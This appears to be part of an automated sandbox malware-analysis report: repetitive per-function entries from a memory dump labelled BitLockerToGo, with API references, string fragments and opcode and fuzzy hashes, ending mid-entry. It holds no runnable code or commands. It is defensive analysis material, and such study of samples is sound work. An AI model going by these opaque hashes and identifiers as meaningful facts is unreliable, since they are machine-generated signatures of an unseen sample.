                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: 4`[b$PA$WP
                                                                                                                                                            • API String ID: 0-2416898959
                                                                                                                                                            • Opcode ID: ff2d449f2aa4d9f3ffc758bd8431d95441b0a1be0e7da30d1f37c7a3b1d079e2
                                                                                                                                                            • Instruction ID: 549f9a84d3ab0341397ba570cd15feaea4388fda82712428225536197b95a57b
                                                                                                                                                            • Opcode Fuzzy Hash: ff2d449f2aa4d9f3ffc758bd8431d95441b0a1be0e7da30d1f37c7a3b1d079e2
                                                                                                                                                            • Instruction Fuzzy Hash: E86156741083808BD724CF24D590AABB7E1FF8A304F689A2DE5D947361DB74D846CB8A
                                                                                                                                                            Function 0042285E Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 306fileCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • CopyFileW.KERNEL32(00000000,3BF239E3,00000000), ref: 00422BBE
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CopyFile
                                                                                                                                                            • String ID: 4`[b
                                                                                                                                                            • API String ID: 1304948518-3962175265
                                                                                                                                                            • Opcode ID: b9961f3839585efaccd962e9f29f2a7d8bbfcdf26810350a4e6eddb5a82c3ae0
                                                                                                                                                            • Instruction ID: 0c3d4c70e60530985c2703d929bb554d0460f899c4b92b9c4cb44d338b57eab6
                                                                                                                                                            • Opcode Fuzzy Hash: b9961f3839585efaccd962e9f29f2a7d8bbfcdf26810350a4e6eddb5a82c3ae0
                                                                                                                                                            • Instruction Fuzzy Hash: D3B199B4A0022A8BDF24CFA5DD917AFB772FF86300F1446A9D4562B3A1D7741A80CF59
                                                                                                                                                            Function 00406E80 Relevance: 3.3, Strings: 2, Instructions: 809COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: 0$8
                                                                                                                                                            • API String ID: 0-46163386
                                                                                                                                                            • Opcode ID: 1171e4ec7a2212bc72df6cc5595066c8480916da860539261476435c3818ad09
                                                                                                                                                            • Instruction ID: e8edce017f487f707f2e6d47ec8d736b69be34296e4668f859d56db9080cb230
                                                                                                                                                            • Opcode Fuzzy Hash: 1171e4ec7a2212bc72df6cc5595066c8480916da860539261476435c3818ad09
                                                                                                                                                            • Instruction Fuzzy Hash: D87248716083419FD710CF18C880B9BBBE1AF88354F14892EF9899B391D379E959CB97
                                                                                                                                                            Function 0042BADA Relevance: 3.3, APIs: 2, Instructions: 261COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Variant$ClearInit
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2610073882-0
                                                                                                                                                            • Opcode ID: c43d62e8caaeee034f6adf92c263bea60ae7a2dadf9431be23655d3ba116909b
                                                                                                                                                            • Instruction ID: f0766954b7b5b795c55ec1d0f4201926e4f1f9f3987028cba26740dcb7b0fd3e
                                                                                                                                                            • Opcode Fuzzy Hash: c43d62e8caaeee034f6adf92c263bea60ae7a2dadf9431be23655d3ba116909b
                                                                                                                                                            • Instruction Fuzzy Hash: BDB15CB210D7C19ADB24EF64D51579FBEE1ABA1385F058C2ED0C98B382D67C8844CB97
                                                                                                                                                            Function 00430EAE Relevance: 3.2, APIs: 2, Instructions: 237COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Variant$ClearInit
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2610073882-0
                                                                                                                                                            • Opcode ID: 4eb585e7636d6ba05d5816dda76f47ddf43147e3e8da7acdbb29f86e7ce18253
                                                                                                                                                            • Instruction ID: 4b4a2dc297dddf4c47e3306fdfb4e53bb7a54f94cb5cfa58beda48895b742729
                                                                                                                                                            • Opcode Fuzzy Hash: 4eb585e7636d6ba05d5816dda76f47ddf43147e3e8da7acdbb29f86e7ce18253
                                                                                                                                                            • Instruction Fuzzy Hash: B0A170B09193808AD701FF74D94630EBEB1EB5234AF0A895DD8C94B352E678C65CDB63
                                                                                                                                                            Function 0042E8D7 Relevance: 3.2, APIs: 2, Instructions: 230COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Variant$ClearInit
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2610073882-0
                                                                                                                                                            • Opcode ID: 937754175d20578f06493ae6c704ee8573383071d2f868bc382b2539920b2837
                                                                                                                                                            • Instruction ID: c322c4c80fd1420a24b9500037cb4fd9b04b6c47a114addf3463b4293bcc2ac7
                                                                                                                                                            • Opcode Fuzzy Hash: 937754175d20578f06493ae6c704ee8573383071d2f868bc382b2539920b2837
                                                                                                                                                            • Instruction Fuzzy Hash: 88A171B09193808AD701FF64D94530EBEB1EB5234AF4A895DE8C84B352E678C55CDB73
                                                                                                                                                            Function 0042C9B7 Relevance: 3.2, APIs: 2, Instructions: 195COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Variant$ClearInit
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2610073882-0
                                                                                                                                                            • Opcode ID: 682c4dffb5ce9691a029d2f982dc75b67a9a51b5a39244f86c501d207a0e764b
                                                                                                                                                            • Instruction ID: 2fa92ac346114f71ec5b8bb95167e382632e860aeab496c27a4361876f2d7e0b
                                                                                                                                                            • Opcode Fuzzy Hash: 682c4dffb5ce9691a029d2f982dc75b67a9a51b5a39244f86c501d207a0e764b
                                                                                                                                                            • Instruction Fuzzy Hash: 3891D7B110D7C18ED361EF64CA0638FBEE0AF6174AF89880EE0D84B282D7748549DB57
                                                                                                                                                            Function 0042D056 Relevance: 3.2, APIs: 2, Instructions: 182COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Variant$ClearInit
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2610073882-0
                                                                                                                                                            • Opcode ID: ea961aca6c503c6e50442a54cc3cd2bb5cbbae6d4d91e5a8cfdd1c12522c78a7
                                                                                                                                                            • Instruction ID: e6952b2da44c6cf9980322370981645b448c4fbbff7929ec209f8aa0f69e46d0
                                                                                                                                                            • Opcode Fuzzy Hash: ea961aca6c503c6e50442a54cc3cd2bb5cbbae6d4d91e5a8cfdd1c12522c78a7
                                                                                                                                                            • Instruction Fuzzy Hash: 1591BFB510D7828AD310EF64C51639FBEF0EFA2749F158C1EE1E887292C6788588DB57
                                                                                                                                                            Function 0043E080 Relevance: 3.1, Strings: 2, Instructions: 621COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: %7$%7
                                                                                                                                                            • API String ID: 0-3114740580
                                                                                                                                                            • Opcode ID: 95702ab8c8dfd4ffedce7bff869b12acbd51280852a3c4ef4d7a9b65a7f033b5
                                                                                                                                                            • Instruction ID: d4ddb7d9814fba6a3bd99f3c5521e18485b3bc3c6a052377e5f9b84667f3e06b
                                                                                                                                                            • Opcode Fuzzy Hash: 95702ab8c8dfd4ffedce7bff869b12acbd51280852a3c4ef4d7a9b65a7f033b5
                                                                                                                                                            • Instruction Fuzzy Hash: 8E221635A05216CFCB08CF68D9906AFB7F2FF8A304F28896DC841A7395D735A911CB95
                                                                                                                                                            Function 0043B050 Relevance: 3.1, Strings: 2, Instructions: 575COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: 476$476
                                                                                                                                                            • API String ID: 0-1821123138
                                                                                                                                                            • Opcode ID: 38f795252a826b460610c94ff5dd04650731357aba88f3b62e24f205637323ae
                                                                                                                                                            • Instruction ID: f4853f25a7115d2ccb9483929346ca02aa1e36ed629206181771a5fec7e11523
                                                                                                                                                            • Opcode Fuzzy Hash: 38f795252a826b460610c94ff5dd04650731357aba88f3b62e24f205637323ae
                                                                                                                                                            • Instruction Fuzzy Hash: CA128C742093419FC714CF29C890B2FB7E1EB99314F189A2EE6D587392D739D805CB9A
                                                                                                                                                            Function 0041C660 Relevance: 2.9, Strings: 2, Instructions: 447COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: 4`[b$xy
                                                                                                                                                            • API String ID: 0-3861070957
                                                                                                                                                            • Opcode ID: 32874e9922531811730813ef1462c357581392f5c3e4b505af1d527c3c503f32
                                                                                                                                                            • Instruction ID: 40080dca2f627201fa99e23294c6caa4fce92423dc08f85d2d2a9e2f3d3bfbd8
                                                                                                                                                            • Opcode Fuzzy Hash: 32874e9922531811730813ef1462c357581392f5c3e4b505af1d527c3c503f32
                                                                                                                                                            • Instruction Fuzzy Hash: ECD1DDB15482009BD715EF18C8D1B6BB7E1EF96354F04481EE4C687391E339E990CBAB
                                                                                                                                                            Function 004063E0 Relevance: 2.9, Strings: 2, Instructions: 434COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: )$IEND
                                                                                                                                                            • API String ID: 0-707183367
                                                                                                                                                            • Opcode ID: fe88e6eb84e576e94e5e9cf8292a898bf1ac053a1a194131b256779c269e66ca
                                                                                                                                                            • Instruction ID: d84f0a7c753a6f14cc2c5e98a322df84888d3b7d15746eb4d54176d0f752d062
                                                                                                                                                            • Opcode Fuzzy Hash: fe88e6eb84e576e94e5e9cf8292a898bf1ac053a1a194131b256779c269e66ca
                                                                                                                                                            • Instruction Fuzzy Hash: A2F1C0B1A047119BD314DF28C84575ABBE0BB85314F05463EE99AA73C1D778E924CBCA
                                                                                                                                                            Function 004211B0 Relevance: 2.9, Strings: 2, Instructions: 374COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: 4`[b$A@
                                                                                                                                                            • API String ID: 0-3080864223
                                                                                                                                                            • Opcode ID: c85e80eada8b595bcd8dec67665edaffd9fe9b7f5aea5fcdfa1f5076c87ae2b5
                                                                                                                                                            • Instruction ID: 667f5a27c419ae563cc22f1d67130efefa029fb26cebeccfba75b67c4bf04443
                                                                                                                                                            • Opcode Fuzzy Hash: c85e80eada8b595bcd8dec67665edaffd9fe9b7f5aea5fcdfa1f5076c87ae2b5
                                                                                                                                                            • Instruction Fuzzy Hash: 17C1BBB4E00228DFEF14CFA5E995BAEBB71FF06300F5040A9E50A6B252C7345A45CF99
                                                                                                                                                            Function 0043D470 Relevance: 2.7, Strings: 2, Instructions: 171COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: 476$@
                                                                                                                                                            • API String ID: 0-1619901514
                                                                                                                                                            • Opcode ID: 2edd24f0470ea495756651cbb646ca1a85ee499d5599157cfa72ce7a226500df
                                                                                                                                                            • Instruction ID: 5274497a0d402a1b10b049c383913524a6e8a02ad7b7e978e53740151cc6be14
                                                                                                                                                            • Opcode Fuzzy Hash: 2edd24f0470ea495756651cbb646ca1a85ee499d5599157cfa72ce7a226500df
                                                                                                                                                            • Instruction Fuzzy Hash: C75126B06193008BD314DF19D49076BB7F2FFAA704F04A92EE1C58B361D73A9815DB5A
                                                                                                                                                            Function 004323DD Relevance: 2.6, Strings: 1, Instructions: 1370COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: 4
                                                                                                                                                            • API String ID: 0-4088798008
                                                                                                                                                            • Opcode ID: adaf9c33dcc47fedfc573862e11efa05822a80d69ab86043e3391ce628374930
                                                                                                                                                            • Instruction ID: 87e5169a84a7c6d015d51784c64767990d8e7e2f63c45a3676347f9b814931e6
                                                                                                                                                            • Opcode Fuzzy Hash: adaf9c33dcc47fedfc573862e11efa05822a80d69ab86043e3391ce628374930
                                                                                                                                                            • Instruction Fuzzy Hash: 61C242B191D3808AD710FBB4ED1638EBEB0EB5130AF4544AED5885B342E6744A9CDF63
                                                                                                                                                            Function 004020AD Relevance: 2.3, Strings: 1, Instructions: 1094COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: r+@
                                                                                                                                                            • API String ID: 0-2828589525
                                                                                                                                                            • Opcode ID: bb1f22855033e4373579e0f629f41e878020256f4b8940ca8e726927dd3cfa80
                                                                                                                                                            • Instruction ID: 0d601082f3fddcf8a6d57d7fb07cda231c93ff33936f2a1aef2fbd49c469f597
                                                                                                                                                            • Opcode Fuzzy Hash: bb1f22855033e4373579e0f629f41e878020256f4b8940ca8e726927dd3cfa80
                                                                                                                                                            • Instruction Fuzzy Hash: FB92147A61C251EFD304CF28D89126AB7E2FB86716F098A7DE0D483391C339DA55CB85
                                                                                                                                                            Function 00401FC5 Relevance: 2.3, Strings: 1, Instructions: 1039COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: r+@
                                                                                                                                                            • API String ID: 0-2828589525
                                                                                                                                                            • Opcode ID: afa774026a89861503ddd84dc71ec75a81babf989be35216b30a84c227a25d6a
                                                                                                                                                            • Instruction ID: 1051428730a2a2cf9c9bff7ea539dd5cf55c9a041dc432fdf8cb40c483e002db
                                                                                                                                                            • Opcode Fuzzy Hash: afa774026a89861503ddd84dc71ec75a81babf989be35216b30a84c227a25d6a
                                                                                                                                                            • Instruction Fuzzy Hash: 6282147A61C291DFD304CF28D85126AB7E2FB96716F098A7DE0C483791C338DA55CB85
                                                                                                                                                            Function 00401330 Relevance: 2.3, Strings: 1, Instructions: 1035COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: r+@
                                                                                                                                                            • API String ID: 0-2828589525
                                                                                                                                                            • Opcode ID: a5db739bc64e2c99662758e10bbfedd6052b1e031c34e72dee04f5c816a2f574
                                                                                                                                                            • Instruction ID: 941cfb58be2f6ff2e4026e36fa0dbe6ceba7a5a9dbdb20ab407d8ebbfa1c3b9a
                                                                                                                                                            • Opcode Fuzzy Hash: a5db739bc64e2c99662758e10bbfedd6052b1e031c34e72dee04f5c816a2f574
                                                                                                                                                            • Instruction Fuzzy Hash: 7682147A61C291DFD304CF28D85126AB7E2FB86716F098ABDE0C483791C339DA55CB85
                                                                                                                                                            Function 0041CDED Relevance: 2.2, APIs: 1, Instructions: 707COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 6ba7beb733572661e7cbb272ad912ba2184529c14f0883f75aa874a1e5e795dc
                                                                                                                                                            • Instruction ID: fddc4bbdbfca3ff58305c710f32b9e2df51800236505f9ed759e35df3333971b
                                                                                                                                                            • Opcode Fuzzy Hash: 6ba7beb733572661e7cbb272ad912ba2184529c14f0883f75aa874a1e5e795dc
                                                                                                                                                            • Instruction Fuzzy Hash: 3232EC75608602DFC704CF28D89066AB3E2FF8A304F49897DE8859B392D779EC51CB49
                                                                                                                                                            Function 00423BE0 Relevance: 1.8, Strings: 1, Instructions: 550COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: `;B
                                                                                                                                                            • API String ID: 0-334945718
                                                                                                                                                            • Opcode ID: 1e63d78b0c997ea6bf236997d86647c47950f5fb558d07b3a3ee316c9d9b5762
                                                                                                                                                            • Instruction ID: 90752fbd8667fa49cb39373b4d57b7a022a3754a131126f3b9a8cd52922f7a36
                                                                                                                                                            • Opcode Fuzzy Hash: 1e63d78b0c997ea6bf236997d86647c47950f5fb558d07b3a3ee316c9d9b5762
                                                                                                                                                            • Instruction Fuzzy Hash: F202CEB4A00229CBDB18CF54D8A07AFB7B1FF46314F044599E8566F395E3789D41CBA8
                                                                                                                                                            Function 0041C400 Relevance: 1.7, APIs: 1, Instructions: 246comCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • CoCreateInstance.OLE32(00441538,00000000,00000001,00441528), ref: 0041C429
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CreateInstance
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 542301482-0
                                                                                                                                                            • Opcode ID: c423282a138e4dd69a8e8fda29ed07e9c2860de9418d6f5ac0c69db86ac4c56f
                                                                                                                                                            • Instruction ID: efcd27da777c76614afb9578cb524e59ae1329c01c42d79ba0897e48e3ba55ec
                                                                                                                                                            • Opcode Fuzzy Hash: c423282a138e4dd69a8e8fda29ed07e9c2860de9418d6f5ac0c69db86ac4c56f
                                                                                                                                                            • Instruction Fuzzy Hash: 0051D1B1684314ABD7209B64CCD6BB773A5EF85368F044559F985CB390F378E880C76A
                                                                                                                                                            Function 0042D9EB Relevance: 1.7, APIs: 1, Instructions: 204COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: String
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2568140703-0
                                                                                                                                                            • Opcode ID: 976dfea8237c820dfa73fc9d51b4f9a81be71abf146756a25561c2364c506751
                                                                                                                                                            • Instruction ID: 5c0fa1c07713a5e72b7651d0f063234db15cadcbd144bb6a7990469365884501
                                                                                                                                                            • Opcode Fuzzy Hash: 976dfea8237c820dfa73fc9d51b4f9a81be71abf146756a25561c2364c506751
                                                                                                                                                            • Instruction Fuzzy Hash: BC71C77260D7508FC314AF28D8503AEBBE1AFD5314F598D2EE8E5CB381D6798805CB46
                                                                                                                                                            Function 00429A49 Relevance: 1.7, Strings: 1, Instructions: 420COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: 0<1
                                                                                                                                                            • API String ID: 0-2445462277
                                                                                                                                                            • Opcode ID: a280e53feeb2d6a17dba2ec84b6cc4f126ae4569895462addb7231ed77ce0a0a
                                                                                                                                                            • Instruction ID: 066b6a8644be477fef833d7856706f6e247d47ecbb30434ab7ec51e793fdec9f
                                                                                                                                                            • Opcode Fuzzy Hash: a280e53feeb2d6a17dba2ec84b6cc4f126ae4569895462addb7231ed77ce0a0a
                                                                                                                                                            • Instruction Fuzzy Hash: 91E1F570204B918BD334CF26D4907A7BBE2AF52304F544A5ED8EB4B792C779B849CB94
                                                                                                                                                            Function 00424B70 Relevance: 1.7, Strings: 1, Instructions: 420COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: "
                                                                                                                                                            • API String ID: 0-123907689
                                                                                                                                                            • Opcode ID: c8544e0c088372b2b01af0a4a27fd72a30c90c7d80d14513e3c5853a61a61ceb
                                                                                                                                                            • Instruction ID: 1cbd2db5c34a65437f0dec493b3808c859ced597881b4f7463596397152dde8e
                                                                                                                                                            • Opcode Fuzzy Hash: c8544e0c088372b2b01af0a4a27fd72a30c90c7d80d14513e3c5853a61a61ceb
                                                                                                                                                            • Instruction Fuzzy Hash: C9D1F6B2B083205BD724CE25E85076BB7D5AFC4350F89892FE89987381D738DD4587DA
                                                                                                                                                            Function 0043E390 Relevance: 1.7, Strings: 1, Instructions: 414COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: %7
                                                                                                                                                            • API String ID: 0-1474192009
                                                                                                                                                            • Opcode ID: fa5061bea1924975d2a6e2ad4a31e45d729a66a877d82ee4640a8f01ee5eb968
                                                                                                                                                            • Instruction ID: fd138ac7190559c5da5ffa1ae91ab7348a5179b75e8251a9d793bd0951800d51
                                                                                                                                                            • Opcode Fuzzy Hash: fa5061bea1924975d2a6e2ad4a31e45d729a66a877d82ee4640a8f01ee5eb968
                                                                                                                                                            • Instruction Fuzzy Hash: 81E1AE75E0111ACFCF04CFA9C9902AEB7B2FF8A704F288569C81177385D735A916CBA4
                                                                                                                                                            Function 0042C521 Relevance: 1.6, APIs: 1, Instructions: 140COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
